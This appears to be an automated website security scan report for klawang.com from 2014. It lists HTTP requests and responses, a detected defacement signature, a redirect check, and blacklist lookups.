Scanned pages/files
Request | Server response | Status |
http://klawang.com/ | 200 OK Content-Length: 75252 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below) <!-- HTML Encryption provided by iWEBTOOL.com --> Antivirus reports:
Deface/Content modification. The following signature was found: HACKED By AlaaCool | ||
http://klawang.com/AlaaCool | 404 Not Found Content-Length: 325 Content-Type: text/html | clean |
http://klawang.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: klawang.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Apr 2014 19:38:10 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Length: 75252
Content-Type: text/html
X-Powered-By: PHP/5.3.28
...75252 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: klawang.com
Referer: http://www.google.com/search?q=klawang.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=klawang.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://klawang.com/
Result: klawang.com is not infected or malware details are not published yet.